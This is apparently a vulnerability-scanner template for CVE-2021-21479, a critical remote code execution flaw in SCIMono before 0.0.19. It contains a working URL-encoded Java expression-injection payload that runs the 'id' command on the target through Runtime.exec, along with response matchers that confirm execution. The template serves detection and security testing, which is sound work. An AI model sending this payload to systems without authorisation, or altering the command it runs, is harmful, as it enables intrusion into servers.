id: CVE-2021-21479

info:
  name: SCIMono < v0.0.19 Remote Code Execution
  author: dwisiswant0
  severity: critical
  reference: https://securitylab.github.com/advisories/GHSL-2020-227-scimono-ssti/
  description: |
    In SCIMono before 0.0.19, it is possible for an attacker to inject and
    execute java expression compromising the availability and integrity of the system.
  tags: cve,cve2021,scimono,rce
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H
    cvss-score: 9.10
    cve-id: CVE-2021-21479
    cwe-id: CWE-74

requests:
  - method: GET
    path:
      - "{{BaseURL}}/Schemas/$%7B''.class.forName('javax.script.ScriptEngineManager').newInstance().getEngineByName('js').eval('java.lang.Runtime.getRuntime().exec(\"id\")')%7D"

    matchers:
      - type: word
        words:
          - "The attribute value"
          - "java.lang.UNIXProcess@"
          - "has invalid value!"
          - '"status" : "400"'
        part: body
        condition: and